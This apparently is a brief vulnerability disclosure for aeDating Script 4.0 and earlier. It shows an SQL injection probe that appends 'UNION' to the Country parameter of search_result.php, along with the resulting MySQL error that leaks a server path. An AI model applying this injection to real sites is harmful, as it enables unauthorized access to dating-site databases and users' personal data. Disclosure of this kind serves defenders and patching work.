Online Dating Software by AEwebworks - aeDating Script <= 4.0 Version Vulnerability
Online Dating Software by AEwebworks - aeDating Script <= 4.0 Version
I have found Vulnerability in Online Dating Software by AEwebworks - aeDating
Script <= 4.0 version which is exploitable when you are searching for your
soulmate at aeDating service Software.
For example :
www.[target].com/search.php just choose one Country and click on the Search
button , After having done that you can see something like this :
www.target.com/search_result.php?Sex=male&LookingFor=female&DateOfBirth_start=18&DateOfBirth_end=40&Country%5B%5D=0
And at this instant to complete it all, all you have to do is add something of
your individual choosing at the end of the link for an example UNION
www.target.com/search_result.php?Sex=male&LookingFor=female&DateOfBirth_start=18&DateOfBirth_end=40&Country%5B%5D=0UNION
And search result:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /home/site/public_html/search_result.php on line 370
ERROR Database access error
Best Regards
Alex